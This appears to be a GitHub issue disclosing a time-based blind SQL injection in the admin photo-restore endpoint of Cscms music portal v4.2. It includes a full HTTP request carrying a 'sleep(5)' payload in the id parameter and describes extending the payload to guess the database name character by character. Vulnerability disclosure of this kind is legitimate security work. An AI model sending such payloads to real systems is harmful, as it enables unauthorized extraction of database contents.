SQL injection vulnerability exists in Cscms music portal system v4.2

#### Details

there is a Injection vulnerability exists in pic_Pic.php_hy

Injection occurs when restoring deleted photos from the trash

```
GET /admin.php/pic/admin/pic/hy?id=3)and(sleep(5))--+ HTTP/1.1
Host: cscms.test
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://cscms.test/admin.php/pic/admin/pic?yid=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=o58jedqf4p0pobv4atdiuae0n6015865
Connection: close
```

![image](https://user-images.githubusercontent.com/96719328/163910647-19c07b7c-50cb-4be8-b2de-cb920008fe45.png)

Discovery success makes the server sleep,Construct payload,Then construct payload to blast database

![image](https://user-images.githubusercontent.com/96719328/163910755-48dd974e-6f23-4fd1-aeae-3d072f4e7bf6.png)

![image](https://user-images.githubusercontent.com/96719328/163910829-1d8c7fe3-91de-49af-be8c-7ccd2db34007.png)

Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

SQL injection vulnerability exists in Cscms music portal system v4.2 #26

Details

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development